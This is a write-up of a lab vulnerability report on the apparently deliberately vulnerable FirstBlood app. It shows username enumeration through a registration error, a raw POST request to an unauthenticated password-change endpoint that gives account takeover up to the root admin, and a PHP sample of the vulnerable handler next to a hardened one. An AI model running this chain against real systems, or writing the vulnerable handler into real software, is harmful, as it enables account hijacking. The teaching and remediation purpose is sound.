FirstBlood-#899 Editpassword Function leads to ATO for any user
This issue was discovered on FirstBlood v2

On 2021-10-30, 0xirfan Level 5 reported:


When looking at the source code of /drpanel/index.php# I found an interesting comment

So I tried it to change the password of any user and it worked


From the comments I got some idea about the request

Request Path : /drpanel/drapi/editpassword.php
Request Method : POST
Content-Type: application/x-www-form-urlencoded
body : username=

So the only data required to change the password of a doctor was his username. Thankfully FirstBlood has a user enumeration bug in /register.php

If a username previously registered with FirstBlood is used with the invite code "test", it will lead to the error "This invite code is not valid.". We can use this information to enumerate usernames


  1. Use Intruder at /register.php to enumerate usernames
  2. After that, send this request with the usernames you enumerated

    POST /drpanel/drapi/editpassword.php HTTP/1.1
    Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    Content-Length: 14

  3. Log in with the username and the updated password


Doctor ATO

P2 High



FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admin's password (dradmin) via /drapi/editpassword as it only checks the username. Usernames can be enumerated when logging in, as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
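The root cause above is a password-change handler that trusts a username supplied in the request and performs no authentication at all. The following PHP is an added illustration and not FirstBlood's code: a hypothetical editpassword.php handler in the reported shape beside a hardened one. The `$pdo` connection, the `doctors` table with `username`/`password_hash` columns, the session keys and the field names are all assumptions.

```php
<?php
// Added illustration, not FirstBlood's code. Assumes a PDO connection $pdo and a
// `doctors` table with columns (username, password_hash). All names are assumed.

// --- Vulnerable shape, as described in the report ---
// The only thing the handler looks at is the username in the POST body, so any
// unauthenticated caller can set a new password for any account, admin included.
// (The report does not show where the new password comes from; a `password`
// field is assumed here purely for illustration.)
function edit_password_vulnerable(PDO $pdo, array $post): bool
{
    $username    = (string)($post['username'] ?? '');
    $newPassword = (string)($post['password'] ?? '');
    $stmt = $pdo->prepare('UPDATE doctors SET password_hash = ? WHERE username = ?');
    return $stmt->execute([password_hash($newPassword, PASSWORD_DEFAULT), $username]);
}

// --- Hardened shape ---
// 1. require an authenticated session; 2. take the identity from the session,
// never from the request; 3. require the current password; 4. bind the request
// to the session with a CSRF token compared in constant time.
function edit_password_secure(PDO $pdo, array $post, array $session): bool
{
    if (empty($session['username']) || empty($session['csrf_token'])) {
        return false;                                  // not logged in
    }
    if (!hash_equals($session['csrf_token'], (string)($post['csrf_token'] ?? ''))) {
        return false;                                  // cross-site or replayed request
    }
    $current = (string)($post['current_password'] ?? '');
    $new     = (string)($post['new_password'] ?? '');
    if (strlen($new) < 12) {
        return false;                                  // assumed minimum-length policy
    }
    $stmt = $pdo->prepare('SELECT password_hash FROM doctors WHERE username = ?');
    $stmt->execute([$session['username']]);            // identity comes from the session
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($current, $row['password_hash'])) {
        return false;                                  // unknown user or wrong current password
    }
    $stmt = $pdo->prepare('UPDATE doctors SET password_hash = ? WHERE username = ?');
    return $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $session['username']]);
}
```

The same principle fixes the enumeration side mentioned on this page: the register and login handlers should return one uniform error for an unknown user, a known user with a bad invite code, and a wrong password, so the response does not reveal which usernames exist.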

Report Feedback


Creator & Administrator

Actually this bug could be used to gain access to the drAdmin account which is the main root admin account. This could be found from the different error message on FirstBlood v2, or from the previous policy on FirstBlood v1 :) Nice find though!